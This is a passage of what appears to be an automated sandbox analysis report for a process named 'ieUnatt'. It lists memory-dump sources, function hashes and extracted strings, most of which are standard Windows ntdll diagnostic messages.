                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 6c280327599a6d5a9f526b2f82ac70960b8940d5e38a75a851d30559a8f5bf78
                                                                                                                                                          • Instruction ID: c9c317c926a6812854844b53e141e68fd00f5b62fc58b56fb1f1abb30447c657
                                                                                                                                                          • Opcode Fuzzy Hash: 6c280327599a6d5a9f526b2f82ac70960b8940d5e38a75a851d30559a8f5bf78
                                                                                                                                                          • Instruction Fuzzy Hash: 7CB09B719055C5C9FB11F76046087177D006BD0745F15C562F3038642E4778D1D5E576
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513491170.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_46c0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                                          • API String ID: 0-3558027158
                                                                                                                                                          • Opcode ID: b02f8bfbf4e58316130b185ce0de840188b02248a05ad16ac2bd8673047f9ee0
                                                                                                                                                          • Instruction ID: b52753edaef6e83f5b37ed46b50e48910668b511362caa427ec4505402977401
                                                                                                                                                          • Opcode Fuzzy Hash: b02f8bfbf4e58316130b185ce0de840188b02248a05ad16ac2bd8673047f9ee0
                                                                                                                                                          • Instruction Fuzzy Hash: 1B914FF04482988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89458B85
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                          • API String ID: 48624451-2108815105
                                                                                                                                                          • Opcode ID: da1639a1fff737c04f17fd664ef3b403b59a0c94866e99ce0c132aa50c5296b7
                                                                                                                                                          • Instruction ID: a6bed946307ea666370070272be7bb37a8ccdb26bd3d5bd4c05ba3af2a8addae
                                                                                                                                                          • Opcode Fuzzy Hash: da1639a1fff737c04f17fd664ef3b403b59a0c94866e99ce0c132aa50c5296b7
                                                                                                                                                          • Instruction Fuzzy Hash: 0551EAB1A0411EBFDB15DFAC889097EFBB8BB483457108B69F495D7641E274FE009BA0
                                                                                                                                                          Strings
                                                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04874742
                                                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04874725
                                                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 048746FC
                                                                                                                                                          • Execute=1, xrefs: 04874713
                                                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 04874787
                                                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04874655
                                                                                                                                                          • ExecuteOptions, xrefs: 048746A0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                          • API String ID: 0-484625025
                                                                                                                                                          • Opcode ID: 947b1b701341e1d2d1d392fa33db811c8af0772a0f4c033c8f1e520278616f48
                                                                                                                                                          • Instruction ID: e47a0edc567886aee6e44987a5de82c6a301150cc209a78bb20cd1b997dc5607
                                                                                                                                                          • Opcode Fuzzy Hash: 947b1b701341e1d2d1d392fa33db811c8af0772a0f4c033c8f1e520278616f48
                                                                                                                                                          • Instruction Fuzzy Hash: 8451E8B160021D7AEB10AB69DC95FB973A8EB08709F044EA9D505E7190F7B0FE45CF91
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __aulldvrm
                                                                                                                                                          • String ID: +$-$0$0
                                                                                                                                                          • API String ID: 1302938615-699404926
                                                                                                                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                          • Instruction ID: 582929a8d9547cd8e26066fd947424956bf7875b74cc8515f9911bb4d52b6dff
                                                                                                                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                          • Instruction Fuzzy Hash: 4681AE70E0524D9BEF248F68C8917BEBBA2AFC5364F184B1AD861E7290D734F8408B51
                                                                                                                                                          Strings
                                                                                                                                                          • RTL: Re-Waiting, xrefs: 0487031E
                                                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 048702BD
                                                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 048702E7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                          • API String ID: 0-2474120054
                                                                                                                                                          • Opcode ID: 9139fdb92cf0e69b6b3f5a5d3415fab3ea4c3d58a5c87ddf048f59d6439ccc01
                                                                                                                                                          • Instruction ID: 9ec2d3cd3ed3a1a08833440eb1b46282d37c2b5c2a9a5aac0b50be1051eb4901
                                                                                                                                                          • Opcode Fuzzy Hash: 9139fdb92cf0e69b6b3f5a5d3415fab3ea4c3d58a5c87ddf048f59d6439ccc01
                                                                                                                                                          • Instruction Fuzzy Hash: A5E1AB306087459FD725CF28C994B2AB7F0AB89718F140F59F6A5CB290E774E984DB42
                                                                                                                                                          Strings
                                                                                                                                                          • RTL: Re-Waiting, xrefs: 04877BAC
                                                                                                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04877B7F
                                                                                                                                                          • RTL: Resource at %p, xrefs: 04877B8E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                          • API String ID: 0-871070163
                                                                                                                                                          • Opcode ID: 1c320fe9a66af5bd36ab1b96e09c531214dda68d57be525d50cc7559f418172e
                                                                                                                                                          • Instruction ID: b896f26588d1bc18297c26fa269cb7a157525bad06ffbab64be2c7706786186d
                                                                                                                                                          • Opcode Fuzzy Hash: 1c320fe9a66af5bd36ab1b96e09c531214dda68d57be525d50cc7559f418172e
                                                                                                                                                          • Instruction Fuzzy Hash: 2441CF717007069FD724DE29C850B6AB7E5EB88725F100F2DF95ADB281DB71F8058B92
                                                                                                                                                          APIs
                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0487728C
                                                                                                                                                          Strings
                                                                                                                                                          • RTL: Re-Waiting, xrefs: 048772C1
                                                                                                                                                          • RTL: Resource at %p, xrefs: 048772A3
                                                                                                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04877294
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                          • API String ID: 885266447-605551621
                                                                                                                                                          • Opcode ID: 72795bca3df845172c5911cbc987a3b8cd911a5d845f644091870f8d4c180605
                                                                                                                                                          • Instruction ID: f0381a9ab14efbff56c5f99fc81f5a6bb435bcda8c0abc5a63fedfd4f3957f38
                                                                                                                                                          • Opcode Fuzzy Hash: 72795bca3df845172c5911cbc987a3b8cd911a5d845f644091870f8d4c180605
                                                                                                                                                          • Instruction Fuzzy Hash: F841D071700246ABD720DE29CC41F66B7A5FB84719F100F19FA66EB241DB61F852CBD1
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513491170.00000000046C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_46c0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: $$0:7"$1,?&$3zv4$zv23
                                                                                                                                                          • API String ID: 0-379306231
                                                                                                                                                          • Opcode ID: ff15ea654525b40ac11d1f418f6c1f760e806326c8e1028e0868aabd69452887
                                                                                                                                                          • Instruction ID: 5a25bad1706600e7e8574b3b85abe333ca69b5df34e7f3722918d31bef226b8e
                                                                                                                                                          • Opcode Fuzzy Hash: ff15ea654525b40ac11d1f418f6c1f760e806326c8e1028e0868aabd69452887
                                                                                                                                                          • Instruction Fuzzy Hash: 10F089300287444FC708AF14C44469676E1FB89348F80165CF88ACB251EB75C6058B87
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __aulldvrm
                                                                                                                                                          • String ID: +$-
                                                                                                                                                          • API String ID: 1302938615-2137968064
                                                                                                                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                          • Instruction ID: af7e84beeefef9a9f8e07ef2b7b18cd7d030a7120f481fbf5c71eff592d932e5
                                                                                                                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                          • Instruction Fuzzy Hash: 6191AF70E0021E9ADB24DF69C880ABEB7A5AFC4724F544F1AEC55E72C0E774B9408B21
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: $$@
                                                                                                                                                          • API String ID: 0-1194432280
                                                                                                                                                          • Opcode ID: 46acc2634033342d2bc6637846a0c51b0af60b48d7c81d1e27664675da9d1672
                                                                                                                                                          • Instruction ID: 292af9ed6c88a7cb75236a1206bbcd8270feab3077926cd2d93984e0ad4aa35b
                                                                                                                                                          • Opcode Fuzzy Hash: 46acc2634033342d2bc6637846a0c51b0af60b48d7c81d1e27664675da9d1672
                                                                                                                                                          • Instruction Fuzzy Hash: B1812DB1D012699BDB71DF54CC44BEAB7B8AB08714F0046DAE91AF7280E7746E84CF61
                                                                                                                                                          APIs
                                                                                                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 0488CFBD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: true
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.00000000048FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_47d0000_ieUnatt.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallFilterFunc@8
                                                                                                                                                          • String ID: @$@4Cw@4Cw
                                                                                                                                                          • API String ID: 4062629308-3101775584
                                                                                                                                                          • Opcode ID: cab3fe0205c1c0af8b00ab852fdfd7ff1109bb7367e14300b52111d8f47841de
                                                                                                                                                          • Instruction ID: 4361fcc7ff33434755adcf5dff1f276f6e465e964027b8977821ec75638e0049
                                                                                                                                                          • Opcode Fuzzy Hash: cab3fe0205c1c0af8b00ab852fdfd7ff1109bb7367e14300b52111d8f47841de
                                                                                                                                                          • Instruction Fuzzy Hash: BD418571900218DFEB21AF99D840A6DBBF8FF54704F004A2EED15EB265E774E901CB62